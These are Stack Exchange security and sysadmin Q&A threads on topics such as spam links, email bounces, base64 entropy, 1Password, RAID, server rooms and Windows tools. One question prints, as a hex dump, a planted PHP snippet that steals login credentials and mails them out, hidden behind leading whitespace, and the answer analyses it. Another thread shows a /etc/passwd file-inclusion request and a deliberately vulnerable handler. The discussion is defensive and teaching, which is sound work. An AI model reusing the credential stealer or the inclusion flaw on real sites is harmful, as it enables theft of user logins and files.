I'm moderating one small Discourse forum and we, like everyone else, get spammers from time to time. Our forum is small, like 40-60 weekly unique visitors. Our forum requires that each new user's first post must be reviewed by a moderator before it appears and this catches most of the spammers. Recently we've been getting spammers posting to some older thread without contributing anything new, like writing: "Thank you. This solved my problem." While posts like these are suspicious, a moderator can't block them outright because they aren't against any rules and they might be coming from a legit user who has just created an account in order to thank someone for helping them out. Usually after their first post is published, the spammers come back a day or two later and they either make a new post or they edit their previous post to include "hidden links", like: Thank you[.](https://www.SomeRandomSpamURL.com/) This solved my problem[.](https://www.SomeOtherRandomSpamURL.com/) [.](https://www.EvenMoreRandomSpamURLs.com/)) I'm simply curious as to why would someone do this? I understand the purpose of regular spam links where the spammer tries to explicitly divert traffic to some site, but if the link is hidden behind a dot, then 99% of users likely won't ever realize there's a link to be clicked. If they do, then they'll likely realize it's a scam link. It's also not like someone could accidentally hit a dot on a forum post either. What are these spammers trying to gain by creating these "hidden" spam links?
It could be an attempt to boost the spam sites in search engine results by creating backlinks to it, which is a common SEO technique (although debatable how effective it is, as search engines can often detect this kind of dodgy behaviour).
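If you want to surface these posts automatically for moderation, a rough sketch like the following flags Markdown links whose visible text is just a punctuation character. The regex and the sample post are illustrative assumptions - Discourse's exact Markdown flavour may need a slightly different pattern.

```python
import re

# Markdown links whose visible text is only a punctuation mark, e.g. [.](https://spam.example)
HIDDEN_LINK = re.compile(r"\[\s*[.,;:!\-]?\s*\]\(\s*(https?://[^)\s]+)\s*\)")

def hidden_links(post_markdown: str) -> list[str]:
    return HIDDEN_LINK.findall(post_markdown)

post = "Thank you[.](https://www.SomeRandomSpamURL.com/) This solved my problem[.](https://www.SomeOtherRandomSpamURL.com/)"
print(hidden_links(post))
# ['https://www.SomeRandomSpamURL.com/', 'https://www.SomeOtherRandomSpamURL.com/']
```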
{ "source": [ "https://security.stackexchange.com/questions/267335", "https://security.stackexchange.com", "https://security.stackexchange.com/users/287262/" ] }
267,390
I created an online account and received the usual welcome email. In addition, however, an "Undelivered Mail Returned to Sender" email appeared in my inbox one second later. I am the supposed sender, and the website I registered on the recipient. The email which could not be delivered contains (in plain text as well as in a .csv attachment) all the information I had entered upon registration. The website itself seems trustworthy/legitimate. Since I definitely did not send an email (and do not see an email in my outbox or sent folder), I wonder how this is possible and whether this poses a security risk. I found a related question here on this site ( i-received-an-undelivered-mail-is-my-email-address-used-maliciously ), but I can't quite connect the dots. It seems unlikely to me that my email was hacked or maliciously used at exactly that point of time. The password I used on the website was randomly generated and is almost surely unique among all my passwords. If the header was forged and someone was trying to deceive me that I had sent an email, I'd wonder why the email and attachments contained the information I entered upon account creation. If that was a third party, would this mean the website could be compromised? Again, the timing make me wonder if this is realistic. If it was a poorly configured foreign server, why would it appear as if I had tried to send an email with that specific content. The information, as far as I understand, should have been submitted/sent through the registration form. Why send another email with the same information? Why would it appear as if the email was sent from my email address? I would appreciate if someone could shed some more light on this. Please find part of the email header (with my and the website's info anonymized) below. Please excuse the use of an image, but otherwise this post was classified as spam. I also found failed-to-send-emails-that-i-never-sent , but the context is quite different to mine. In my case, the undeliverable email seems to be specifically related the the registration on the website.
It looks like the web service in question has configured their system to forward the welcome emails to an internal address on their end, but misconfigured their system such that the From: line is the customer's address rather than some internal address that they control. Intentional or not, they also fail to consider DMARC , so customers wind up with sketchy-looking emails like this about the website trying to email on their behalf from an unauthorized host. You could help the service out by letting them know about the configuration issue, but ultimately things are working as they ought to as far as your email setup is concerned, so you are safe to just brush this off without consequence too. There does not appear to be any malicious intent, but the way the emails are sent with whatever PII it had is not exactly commendable. As for why they would do this, I'm imagining that they have a weirdly tacked-together process for taking information from their registration form and delivering it to another service via SMTP since there was a CSV attached. As long as the receiving address was controlled by them, my best guess is that they're handling registrations in a frustratingly unsafe, roundabout, and kludgy way for purposes of logging, debugging, "backups," or—shudder to think—processing. I'm also going to speculate that their Fiverr dev(s) received little oversight when stringing this together. In reality, though, this could just be that some developer had set this up as a meantime debugging measure and failed to disable it in production before anyone noticed. I'd email them.
{ "source": [ "https://security.stackexchange.com/questions/267390", "https://security.stackexchange.com", "https://security.stackexchange.com/users/287378/" ] }
267,592
Today this came to my attention. When generating random secrets for e.g. JWT (in node.js the most common way is using the crypto.randomBytes() method), I have noticed a lot of people save these tokens in a base64-encoded manner (i.e. crypto.randomBytes(len).toString('base64')). Charset However, I thought to myself: doesn't saving a random byte buffer in a base64-encoded string undermine the whole principle of them being 'random bytes'? Base64 has a charset of only 64 characters while the native crypto.randomBytes.toString() method supports 2^8 = 256 characters. Ratio Let's say we have a buffer with length n. For a not-base64-encoded buffer of length n, the encoded counterpart has a length of 4 * ceil(n / 3), which means a base64-encoded string has an overhead of approximately 133% of its non-encoded counterpart. Many of you already know this, but for those who don't know: each base64 character represents 6 bits (2^6 = 64). 4 * 6 bits = 24 bits = 3 bytes. This means there are 4 characters encoded for a three-byte buffer. However, I said approximately 133% because the output length is rounded up to a multiple of 4. This means that e.g. 1, 2 or 3 bytes become 4 characters, while 4, 5 and 6 bytes are rounded up to 8 characters. (This is the trailing = you see on base64-encoded buffers most of the time.) Thus, the ratio is approximately 1 to 4 thirds (1:1.33). With the following explanation, what is the smartest thing to do? Saving the buffer itself (short with big charset) or saving the base64-encoded buffer (long with small charset)? Or doesn't it matter for bruteforce applications because the amount of bits is almost the same? Or is base64 even safer because base64 is always 0-2 characters longer? const crypto = require('crypto'); const random = crypto.randomBytes(128); const lenBuffer = random.length; const lenBase64 = encodeURI(random.toString('base64')).split(/%..|./).length - 1; console.log(lenBuffer, lenBase64); // 128 172 => 128 * 1.33 = 170 Edit: I might not have been clear in my question, my apologies. My primary question here is - what would be faster to bruteforce, the short and complex byte buffer or the longer and less complex base64-encoded string? According to password entropy, the length and complexity are not equally proportional, for they are logarithmic instead.
It doesn't matter. A number doesn't change because you change the encoding of it. 101₂ and 5₁₀ are the same number, and contain the same amount of information. The reason we use base64 is that it is safe printable characters; they won't screw up your terminal if you output them to it, and they will transmit nicely in any computer system capable of handling 7-bit ASCII. The drawback is, as you observed, the increased overhead. Or doesn't it matter for brute force applications because the amount of bits is almost the same? Or is base64 even safer because base64 is always 0-2 characters longer? It's not almost the same. It is the same. Computers treat information as numbers – large numbers. If you represent that number as 8-bit bytes, each digit conveys 8 bits of information. If you represent that number as base64, each digit conveys 6 bits of information. It's still the same number, but the number of digits increased due to lower information content per digit. Your question is like asking which bus is the soonest: the one in 600 seconds, the one in ten minutes or the one in 10 minutes.
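A quick Python check mirrors this: re-encoding the same 128 random bytes changes the number of digits, not the amount of randomness. The numbers below match the 128/172 figures from the question.

```python
import base64
import math
import os

raw = os.urandom(128)                 # 128 random bytes = 1024 bits of entropy
b64 = base64.b64encode(raw)

print(len(raw))                        # 128 bytes, 8 bits of information per byte
print(len(b64))                        # 172 characters, ~6 bits of information per character
print(len(raw) * 8)                    # 1024 bits either way
print(math.ceil(len(raw) / 3) * 4)     # 172 -- the 4/3 length overhead, rounded up to a multiple of 4
```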
{ "source": [ "https://security.stackexchange.com/questions/267592", "https://security.stackexchange.com", "https://security.stackexchange.com/users/150123/" ] }
267,609
I am a mathematician, I have a PhD, I am specialised in stochastic processes, finance, pricing and arbitrage theory, I have publications in Q1 journals, but still, I feel that I am missing something ... Currently I work for academia as a researcher. However, I think I am interested in getting into security. I have always had a passion for algorithms and coding and solving riddles, and as a child I wanted to be a hacker. Could you suggest any specific list of steps I should take to get closer to a job in this area? Is it fine if I start with reading "The Web Application Hacker's Handbook"? I am good at math, I can write and read code (lot of experience in python and some in c++), and I think I am good at learning.
{ "source": [ "https://security.stackexchange.com/questions/267609", "https://security.stackexchange.com", "https://security.stackexchange.com/users/287768/" ] }
268,318
I'm trying to understand why MFA is not necessary in 1Password when signing in on a new device. This was the case that triggered my curiosity: (1) I created a 1Password account; (2) I downloaded the Mac application; (3) I installed the Chrome plugin; (4) I then went on my iPhone and installed the app there too. At step no. 4, all I needed to provide was my 1Password password. Why is this secure? Can't anyone download the 1Password iPhone app and try to guess my password? I'm guessing my understanding of their security model is seriously flawed, but I'm eager to learn more.
[ Disclosure: I work for AgileBits, the makers of 1Password, and I helped design the system you are describing ] The security model has some unfamiliar components, but it is presented to users like a normal login, so it is natural that you might think that this suffers from the security weaknesses of traditional logins. Secret Key As 4german correctly pointed out in their answer, your account password is combined on your client with something we call your Secret Key. When you created your account, a 128-bit random Secret Key was generated in your browser on your machine. If you generate your Emergency Kit, you will see your Secret Key in that. Your Secret Key is absolutely necessary for you to decrypt your data, so do save a copy of your Emergency Kit. We do have the Secret Key sync to other devices through end-to-end encrypted services that don't pass through us. Apple's iCloud Keychain is such a service. And so it made it onto your iPhone, where it can be read only by iOS apps signed by AgileBits. It is important that the Secret Key is never handled by our servers, as it is designed to protect you if we were ever to be breached. Not a second factor In the instance you encountered, the Secret Key is kinda-sorta acting like a second factor, as you must be using a device which has received it independently of 1Password servers, but it is a mistake to think of it generally that way. The Secret Key is designed to protect you if your data is captured from our systems. It makes what we hold truly uncrackable. You can enable real 2FA for 1Password, which will require a second factor when you set up a new device. 2FA for unlocking encrypted data on an already enrolled device would be security theater. Client computation Your account password and your Secret Key are your user secrets that are used for two purposes. One purpose is to derive the keys needed to decrypt your data. 1Password can be used offline this way. The other is to derive an authentication key (which I will call x). The process of deriving these keys from your user secrets is designed to be computationally expensive, so it inherently rate-limits guessing, long before a sign-in attempt is made to the server. Unlike traditional authentication, x is never sent to the server. Instead the server constructs a mathematical puzzle that can only be solved with knowledge of x. The puzzle is different each time you log in. Additionally, the server proves to the client that it knows a related secret, v. v was created by your client when you first signed up, and was sent to the server only at first enrollment. As with the client proving knowledge of x, the server's proof of knowledge of v is also a zero-knowledge proof. The server must solve a puzzle that can only be done with knowledge of v. What this all means What looks like a traditional sign-in process to users is actually a far more secure system. You can enable 2FA for 1Password if you wish, but it protects you only from an attacker who (1) can guess your account password, (2) has your Secret Key, and (3) does not have your encrypted data. The circumstances in which both 2 and 3 might hold are rare.
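For readers who want a feel for why the Secret Key matters, here is a deliberately simplified Python sketch. It is emphatically not 1Password's real 2SKD/SRP construction (the salt handling, iteration count and derivation details are made up for the demo); it only illustrates the core idea that both the account password and a high-entropy Secret Key feed the key derivation, so guessing the password alone gets an attacker nowhere against data captured from the server.

```python
import hashlib
import os
import secrets

# Toy illustration only -- NOT 1Password's actual algorithm.

def make_secret_key() -> str:
    # A 128-bit random value generated on the client at account creation.
    return secrets.token_hex(16)

def derive_key(account_password: str, secret_key: str, salt: bytes) -> bytes:
    # Slow, salted derivation over the *combination* of both secrets.
    material = account_password.encode() + b"|" + secret_key.encode()
    return hashlib.pbkdf2_hmac("sha256", material, salt, 650_000)

salt = os.urandom(16)
sk = make_secret_key()
vault_key = derive_key("hunter2-but-longer", sk, salt)

# An attacker who captures server-side data and even guesses the password
# still has to enumerate the 128-bit Secret Key, which is infeasible.
wrong = derive_key("hunter2-but-longer", make_secret_key(), salt)
print(vault_key != wrong)   # True
```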
{ "source": [ "https://security.stackexchange.com/questions/268318", "https://security.stackexchange.com", "https://security.stackexchange.com/users/289106/" ] }
268,435
I recently came across a php file on a compromised website that had what appeared (in Sublime Text) to be a huge white-space gap. When I run a diff against the original source file I can clearly see the malicious code which is snagging logins and passwords and emailing them to someone . The malicious code can also be clearly seen using vim. My assumption is that this is some kind of encoding exploit but I can't for the life of me figure out how it's being hidden and I've never seen anything like this before. Is anyone familiar with this kind of hidden code exploit? Is there a way to make it visible inside Sublime? I realize it may be difficult to say without seeing the file - I am happy to provide said file if need be. EDIT - Hex dump as requested: 0000000 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 * 00000c0 20 20 20 20 20 20 20 20 20 69 66 28 24 74 68 69 00000d0 73 2d 3e 75 73 65 72 2d 3e 6c 6f 67 69 6e 28 24 00000e0 74 68 69 73 2d 3e 72 65 71 75 65 73 74 2d 3e 70 00000f0 6f 73 74 5b 27 75 73 65 72 6e 61 6d 65 27 5d 2c 0000100 20 24 74 68 69 73 2d 3e 72 65 71 75 65 73 74 2d 0000110 3e 70 6f 73 74 5b 27 70 61 73 73 77 6f 72 64 27 0000120 5d 29 29 7b 24 73 6d 61 69 6c 3d 24 5f 53 45 52 0000130 56 45 52 5b 27 48 54 54 50 5f 48 4f 53 54 27 5d 0000140 2e 24 5f 53 45 52 56 45 52 5b 27 52 45 51 55 45 0000150 53 54 5f 55 52 49 27 5d 2e 22 7c 22 2e 24 74 68 0000160 69 73 2d 3e 72 65 71 75 65 73 74 2d 3e 70 6f 73 0000170 74 5b 27 75 73 65 72 6e 61 6d 65 27 5d 2e 22 7c 0000180 22 2e 24 74 68 69 73 2d 3e 72 65 71 75 65 73 74 0000190 2d 3e 70 6f 73 74 5b 27 70 61 73 73 77 6f 72 64 00001a0 27 5d 3b 6d 61 69 6c 28 22 61 6c 74 2e 65 69 2d 00001b0 36 6f 6b 36 77 36 76 32 40 79 6f 70 6d 61 69 6c 00001c0 2e 63 6f 6d 22 2c 24 5f 53 45 52 56 45 52 5b 27 00001d0 48 54 54 50 5f 48 4f 53 54 27 5d 2c 24 73 6d 61 00001e0 69 6c 2c 22 46 72 6f 6d 3a 20 61 64 6d 69 6e 40 00001f0 66 6c 79 2e 63 6f 6d 5c 72 5c 6e 52 65 70 6c 79 0000200 2d 74 6f 3a 20 61 6c 74 2e 65 69 2d 36 6f 6b 36 0000210 77 36 76 32 40 79 6f 70 6d 61 69 6c 2e 63 6f 6d 0000220 22 29 3b 0000223
The code is exploiting a flaw in Sublime to prevent text from being displayed. This is what part of the code looks like in Notepad++. It is obviously looking for post['username'] and post['password']. And Notepad++ can handle even 7000 characters when word wrapping: The flaw is due to Sublime's incorrect word wrap behavior. The 200 leading spaces indent the text far off the screen while also disabling the horizontal scrollbar due to "word wrap", but it actually isn't wrapping any of the text because it treats the 200 spaces as an indent. Zooming out or turning off word wrap would've displayed the text fine. Sublime has its own HexViewer and that has no problems displaying the code on the ASCII panel:
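A defensive sketch along these lines can flag source lines hiding behind an unusually long run of leading whitespace, which is how this payload dodged casual review. The threshold and file extensions are assumptions to tune for your own code base.

```python
import os
import sys

THRESHOLD = 80  # flag lines indented further than any plausible legitimate code

def find_suspicious_indentation(root: str) -> None:
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith((".php", ".js", ".html")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as handle:
                for lineno, line in enumerate(handle, start=1):
                    stripped = line.lstrip(" \t")
                    indent = len(line) - len(stripped)
                    if stripped.strip() and indent >= THRESHOLD:
                        print(f"{path}:{lineno}: {indent} leading whitespace chars before code")

if __name__ == "__main__":
    find_suspicious_indentation(sys.argv[1] if len(sys.argv) > 1 else ".")
```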
{ "source": [ "https://security.stackexchange.com/questions/268435", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71159/" ] }
268,607
I am starting a basic penetration testing course and have come across one doubt. For example, in this URL: http://webapp.thm/index.php?page=1 I get that I am requesting the index.php file from the server and I am specifying that I want to view page 1 as the value of the parameter. But in this other URL: http://webapp.thm/get.php?file=/etc/passwd I am having trouble understanding the request, because I am requesting get.php (which is already a file) and the parameter file is accessing a different file, /etc/passwd . My question is: what does the get.php file contain in this case - or is it a function? It seems to me that it is a function retrieving the /etc/passwd file, but I know that it is not a function, so I am kind of confused about what get.php means. I got a picture describing it from the course:
I am requesting get.php(which is already a file) HTTP is not about requesting files, but about requesting resources specified by the URL. These resources might be a static file returned by the web server but they might also be created dynamically based on the URL. In this specific case you are not requesting the contents of the file get.php to be returned, but you request the program get.php to be executed. And file=/etc/passwd is processed by this program - how exactly depends on the program. Based on your description the program will likely take it as a parameter file with the value /etc/passwd , open the file and return it as response. If this succeeds, this is known as a Local File Inclusion vulnerability (LFI).
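We don't know what the course's actual get.php contains, but a typical vulnerable handler simply opens whatever path the file parameter names. Here is an analogous sketch in Python/Flask (rather than PHP) showing both the vulnerable pattern and a safer variant that pins requests inside an assumed base directory.

```python
import os

from flask import Flask, abort, request, send_file

app = Flask(__name__)
BASE_DIR = "/var/www/app/pages"   # assumed directory of legitimate includable files

@app.route("/get")
def get_vulnerable():
    # Vulnerable pattern (analogous to a naive get.php): the client controls the whole path,
    # so /get?file=/etc/passwd returns the system password file.
    return send_file(request.args.get("file"))

@app.route("/get-safe")
def get_safe():
    # Safer pattern: resolve the path and require it to stay inside BASE_DIR.
    requested = os.path.realpath(os.path.join(BASE_DIR, request.args.get("file", "")))
    if not requested.startswith(BASE_DIR + os.sep):
        abort(403)
    return send_file(requested)
```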
{ "source": [ "https://security.stackexchange.com/questions/268607", "https://security.stackexchange.com", "https://security.stackexchange.com/users/289649/" ] }
268,850
I noticed that, while browsing through many bug bounty and vulnerability disclosure programs, they don't accept issues that are related to TLS/SSL, which includes expired security certificates. Why are companies so unwilling to accept expired certificates, which can easily be fixed?
Why are companies so unwilling to accept expired certificates, which can easily be fixed? With proper certificate validation a client will not connect to a server which provides an expired certificate. This means that no data will be exchanged over the improperly secured connection. This also means that there is no actual security problem - only an availability problem. Sure, there are clients which might ignore that the certificate is expired or users which skip browser warnings. But in this case the real issue is improper certificate validation at the client side, not the expired certificate.
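A hedged illustration of the "availability, not security" point: a client that validates certificates properly aborts the TLS handshake before any application data flows. The URL below is a placeholder standing in for any site serving an expired certificate.

```python
import requests

# Placeholder URL standing in for any site serving an expired certificate.
URL = "https://expired.example.org/"

try:
    requests.get(URL, timeout=10)          # certificate validation is on by default
except requests.exceptions.SSLError as err:
    # The handshake fails and no application data is ever exchanged:
    # an availability problem for the site, not a confidentiality problem for the client.
    print(f"refused to connect: {err}")
```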
{ "source": [ "https://security.stackexchange.com/questions/268850", "https://security.stackexchange.com", "https://security.stackexchange.com/users/279053/" ] }
21
What's the top reason you're unable - or unwilling - to upgrade to the latest available operating system versions?
The current one just works!
{ "source": [ "https://serverfault.com/questions/21", "https://serverfault.com", "https://serverfault.com/users/32/" ] }
24
Originally my system had two SATA disk drives - I added an extra SATA disk drive to my system, and when accessing this disk it sometimes takes about 50 times longer to access the drive. (Windows Explorer can take about 2 mins to populate the basic directory, and there is nothing special about the directory.) This doesn't happen all the time, but I can't identify a pattern at the moment. Any ideas what I've done wrong? (Using Windows Vista Home Premium - the PC is custom made - this is just on my development PC. What other useful info can I give?)
{ "source": [ "https://serverfault.com/questions/24", "https://serverfault.com", "https://serverfault.com/users/54/" ] }
30
Users can't get to their e-mail, the CEO can't get to the company's home page, and your pager just went off with a "911" code. What do you do when everything blows up?
The first answer is: stay calm! I learned the hard way that panicking often just makes things worse. Once that's achieved, the next thing is to actually ascertain what the problem is. Complaints from users and managers will be coming at you from all angles, telling you what THEY cannot do, but not what the problem is. Once you know the problem you can start the plan to fix it and start giving your angry users a timescale!
{ "source": [ "https://serverfault.com/questions/30", "https://serverfault.com", "https://serverfault.com/users/32/" ] }
42
Say I've got a fresh install of Ubuntu, what steps should I take to secure it for use as a Rails application server?
I can't think of any Ubuntu-specific tweaks, but here are a few that apply to all distributions: uninstall all unnecessary packages; use public-key-only authentication in SSH; disable root logins via SSH (doesn't apply to Ubuntu); use the production settings for PHP (php.ini-recommended); configure MySQL to use sockets only. Of course this list isn't complete, and you'll never be completely safe, but it covers all the exploits I have seen in real life. Also, the exploits I have seen were almost always related to insecure user code, not insecure configuration. The default configurations in minimal server distributions tend to be pretty secure.
{ "source": [ "https://serverfault.com/questions/42", "https://serverfault.com", "https://serverfault.com/users/75/" ] }
44
For a more comprehensive list of monitoring tools and their features, check out this Wikipedia page . As the question states, what are the most commonly used tools used for this task and what are their strengths and weaknesses?
I've used Nagios in the past with success. It's very extensible (over 200 add-ons), relatively easy to use, and has lots of reports. A negative would be the initial setup.
{ "source": [ "https://serverfault.com/questions/44", "https://serverfault.com", "https://serverfault.com/users/22/" ] }
86
There seems to be a lot of confusion around having multiple partitions for Windows. Some of the theories I have heard are: (1) it's faster to move to a new partition start than searching for a file start; (2) if you need to format, it's easier since the data is on the other partition; (3) putting the swap file on a separate partition increases performance; (4) file/folder level security. Generally I found the data one to be true, but in that scenario I would rather have separate disks since those will be faster. In short my question is: is there any truth to the above theories, and are there any other reasons to partition a disk?
One of the primary reasons I use different partitions is to separate the data from the OS. Should you need to re-install Windows (which we all know is quite likely) at any point, you can do so without needing to move your data off to somewhere else. As partitions on the same disk will be using the same spindle, there's very little to be gained in terms of speed by partitioning a single disk.
{ "source": [ "https://serverfault.com/questions/86", "https://serverfault.com", "https://serverfault.com/users/103/" ] }
190
We're considering building a ~16TB storage server. At the moment, we're considering both ZFS and XFS as filesystem. What are the advantages, disadvantages? What do we have to look for? Is there a third, better option?
I've found XFS more well suited to extremely large filesystems with possibly many large files. I've had a functioning 3.6TB XFS filesystem for over 2 years now with no problems. Definitely works better than ext3, etc at that size (especially when dealing with many large files and lots of I/O). What you get with ZFS is device pooling, striping and other advanced features built into the filesystem itself. I can't speak to specifics (I'll let others comment), but from what I can tell, you'd want to use Solaris to get the most benefit here. It's also unclear to me how much ZFS helps if you're already using hardware RAID (as I am).
{ "source": [ "https://serverfault.com/questions/190", "https://serverfault.com", "https://serverfault.com/users/196/" ] }
214
I have always used hardware-based RAID because it (IMHO) is on the right level (feel free to dispute this), and because OS failures are more common to me than hardware issues. Thus, with software RAID, if the OS fails the RAID is gone and so is the data, whereas - on a hardware level, regardless of OS - the data remains. However, on a recent Stack Overflow podcast they stated they would not use hardware RAID, as software RAID is better developed and thus runs better. So my question is, are there any reasons to choose one over the other?
I prefer HW RAID, 'cause if you have to pull good disks out of a dead machine you're not limited to the OS configuration of the RAID "array". You do keep backups of your RAID controller's config, don't you? So just load that up on a donor machine, slot in the drives (in the right order! You did label your drives before you pulled them, right?) and restart on a clean OS, and your data is recovered. THE OS DRIVES ARE NOT IMPORTANT DRIVES TO KEEP. THE MOST IMPORTANT STUFF TO KEEP IS THE DATA DRIVES!!!! (You do back up your DATA drives, right?)
{ "source": [ "https://serverfault.com/questions/214", "https://serverfault.com", "https://serverfault.com/users/103/" ] }
238
Sometimes I have to answer support calls responding to PC crashes with blue screens. How can I effectively narrow down the problem giving the information on that screen? What are the most important questions I have to ask the user? Edit: By "diagnose" I mean, how can I interpret the information on the blue screen in order to narrow down the cause of the problem?
When the computer bluescreens it'll most likely create a dump of the memory. The content from memory is written to the Pagefile as the system is going down. It uses the Pagefile as a placeholder for the data since it is too dangerous to try to create a new file on disk. When the machine starts up again it'll detect the dump and move the data into a separate dump file (typically C:\Windows\Memory.dmp or C:\Windows\Minidump\*.dmp). Install WinDbg and open the .dmp file. Click the !Analyze link. Now it'll show you the stack from the thread that killed Windows, and show you which files were involved. Often WinDbg will point you directly at a specific driver file. You can find step-by-step instructions here . I can recommend reading Mark Russinovich's blog and books. You can download WinDbg from Microsoft . So the question to the user is: "Can you e-mail me your dump file?"
{ "source": [ "https://serverfault.com/questions/238", "https://serverfault.com", "https://serverfault.com/users/45/" ] }
261
I have been on the lookout lately for some good tools to fill up my flash drive and I thought I would ask the Server Fault community for recommendations on good tools that will fit onto a thumb drive. Some I use are Driver Packs , CCleaner and the portable apps suite .
These are the utilities I have on my drive: CurrPorts displays the list of all currently opened TCP/IP and UDP ports on your local computer. ftpserver3lite is an FTP server. ftpwanderer2 is an FTP client. ipnetinfo answers questions about an IP address: owner, country/state, range, contact info, etc. miranda - general messaging solution (supports most P2P messaging networks). omziff - encryption/decryption tool. FoxitReader - wonderful alternative to Adobe's PDF reader; light, fast and portable. Qm (The Quick Mailer) - if you just want to send an email the old-fashioned way with no installation. Restoration - quick and basic undelete utility. smsniff - basic TCP sniffer. torpark - a Firefox-based browser for completely discreet browsing. treepad - just a nice utility to organize your data in, much like freemind and other mind maps . cpicture - a picture viewer. DriveMan - for managing hard drives on the local computer. FollowMeIPLite - very much like www.whatismyip.com, only much quicker. hfs - opens a small HTTP file server from a desired folder, for instant file sharing. angry ip scanner - scans IPs. kill.exe - needs no introduction :) putty - a telnet utility every system administrator has got to be familiar with. startup control panel , StartupList , regcleaner - really there are many registry cleaners/managers out there, and lots of them fit nicely on a thumb drive. Revealer - reveals passwords from password fields. It is very useful in many situations. vncviewer - client for the VNC remote desktop protocol. WinAudit - audits a Windows machine. Lots of useful information. xcopy.exe - it is still useful to have around. TcpView - shows all TCP and UDP endpoints on your system. Beyond Compare is fantastic, btw. Also, you might want to check out portable freeware .
{ "source": [ "https://serverfault.com/questions/261", "https://serverfault.com", "https://serverfault.com/users/123/" ] }
331
What do I have to consider when I'm planning a new server room for a small company (30 PCs, 5 servers, a couple of switches, routers, UPS...)? What are the most important aspects in order to protect the hardware? What things do not belong in a server closet? Edit: You may also be interested in this question: Server Room Survival Kit . Thank you!
Enough space for expansion Plenty of network ports Sufficient network bandwidth Plenty of dedicated power sockets Should not be on the ground floor (risk of flooding + less secure) Fire suppression facilities + smoke alarms IP KVM for remote access Telephone (so the operator can call a support line while looking at the hardware) Pens + paper A label printer - label everything! A standard printer (nice to have) Spare network and power cables Air conditioning (also dehumidifies) Good UPS (with automated/controlled shutdown functionality) Sufficient power to run everything (and enough for expansion) Entrance security (preferably also with logging) Physical security (security on windows, entrance, etc.) Whiteboard (nice to have) Fireproof safe (for storing backup tapes, passwords and installation media) Good server racks - well maintained (cabling) Enough space to work comfortably behind the servers A table large enough to build/dismantle a server on (plus monitor, keyboard and mouse) At least 1 chair Tidy patch panel (especially if you patch to PC's and telephones in the office) Good lighting
{ "source": [ "https://serverfault.com/questions/331", "https://serverfault.com", "https://serverfault.com/users/45/" ] }
403
It seems to me that since RAID volumes are logical (as opposed to physical), the layout that the OS believes they have might not correspond to the actual physical layout. So does defrag make sense for RAID?
Yes, defrag does still make sense for RAID. While it's true that the layout the OS sees isn't the same as the physical layout, it's monotonic, ie the virtual sectors are in the same order on the disk as they are on the array, it's just they are scattered across disks. Also, the RAID controller will use predictive caching (if it has it) based on an understanding of the array layout, so that will work better if you have defrag. The only time you don't need to defrag is if the underlying storage medium is random access, so don't defrag your USB key, and don't defrag an SSD.
{ "source": [ "https://serverfault.com/questions/403", "https://serverfault.com", "https://serverfault.com/users/370/" ] }
468
Title says it all. For personal usage, I tend to prefer Debian/Ubuntu over Redhat. It's not necessarily that I dislike Redhat (or more specifically CentOS or Fedora) so much as it is that I like Debian's package management system so much better. What are the reasons why Redhat is so popular? (And just to be clear, I'm asking because I genuinely want to know what the reasons are. So no flame wars!)
In the early days of Linux being taken more seriously in the everyday business world there was always a nervousness that followed mention of the name. Tech employees found that "It was started by a university student in his basement" wasn't the best way to sell the idea of an Open Source operating platform to management. The need for a solid company backing Linux alternatives was filled by Red Hat in those early days and probably had the single biggest impact on Linux for the Corporate Masses. They were able to provide support solutions along with their own branded versions of the OS. Thanks to their early success with the full range of Linux uses from personal to corporate, they built up a huge amount of momentum and a recognisable brand which remains with them to this day, even with competition from other big names like Novell.
{ "source": [ "https://serverfault.com/questions/468", "https://serverfault.com", "https://serverfault.com/users/405/" ] }
612
We always use IIS' FTP service, but recently we have had a few problems with it; what FTP service do you recommend for IIS? We use Windows Server and Windows XP on the clients. A free version is a must. We are now considering FileZilla and WarFtp, and we will be having 100 concurrent connections.
FileZilla; it's free, easy to set up and manage, but very powerful. The ability to use non-directory users is a big plus.
{ "source": [ "https://serverfault.com/questions/612", "https://serverfault.com", "https://serverfault.com/users/367/" ] }
720
I am looking for others' lists of programs that absolutely must be installed on a fresh install of Windows before going any further. I hope to compile a list here to use as a reference for all new Windows installs/restores. Automating the installation of this list of programs is the next step. Some great lists so far! I will continue to monitor this and then make a list of everything I use. Another thought: has anyone come up with a way to automate this? Possibly going to each program's download page, downloading the most recent version, and installing? I may weigh in on this as well; any ideas would be appreciated! As far as the type of machine, most of mine are hybrids, i.e. server, workstation, development machine. So all of the above!
Basically, here is my software list (maybe not completely up to date):

Editing
Pspad : A free and really powerful editor.
NVU : An HTML editor.
Kompozer : The NVU bug-fixes release.

System
Process Explorer : Replace the default Windows task manager with Process Explorer!
Autoruns : Want to know what is launched when Windows starts? Try Autoruns!
CubicExplorer : An alternative to Windows Explorer, with bookmarks, tabs...
Supercopier : Replace the default copy tool of Windows.
Unlocker : A process is locking a resource on your disk? Use Unlocker to solve this problem.
Console² : Swap the DOS command window for Console², with tabs, better UI...
Taskbar shuffle : Rearrange the programs on your Windows taskbar by dragging and dropping them.

Tools
Stroke It : Execute commands and start programs with just a mouse gesture! Magic!
7-zip : A free file archiver.
Ditto : A copy-paste manager, so you are not limited to one element in your clipboard.
Dirkey : Use Ctrl-0 to Ctrl-9 to access your preferred directories on your disks in Windows Explorer.
Print screen : A free tool to create screenshots, with a lot of options...
Launchy : Type Ctrl-Space, then write the first letters of the application, and it's launched!
Keybreeze : Almost the same thing as Launchy.
PDF Creator : To transform any document to the PDF format (a new printer is added to your configuration).

Development
Tortoise CVS : A CVS extension for Windows Explorer.
Eclipse : Java development IDE.
Netbeans : Another Java development IDE, much better than Eclipse when you need to create Java applications with Swing (this is my opinion ;o) ).

Multimedia
Foobar 2000 : A powerful media player. But needs a lot of configuration...
XnView : A powerful image viewer. Also offers lots of conversion controls.

Internet
Mozilla Firefox : THE browser.
Mozilla Thunderbird : A really good email reader.
Trillian , Koolim , Pidgin (ex Gaim), Meebo (online): Instant Messenger tools.

Firefox plugins
Colorzilla : A color picker, to find out the color code of any part of the current page.
Download statusbar : A download manager.
Firebug : An extension for Javascript or CSS debugging. An extension for Internet Explorer that does almost the same thing: IE Developer Toolbar .
IE Tab : View pages with the Internet Explorer engine.
Measure It : A ruler to measure web components of a page.
PDF download : A PDF manager.
Sage : An RSS viewer.
Stop or reload : Stop and Reload buttons are now located on the same button.
Tab mix plus : Options for tab management.
Web developer : Lots of tools for web development.

Edited to add links, as requested.
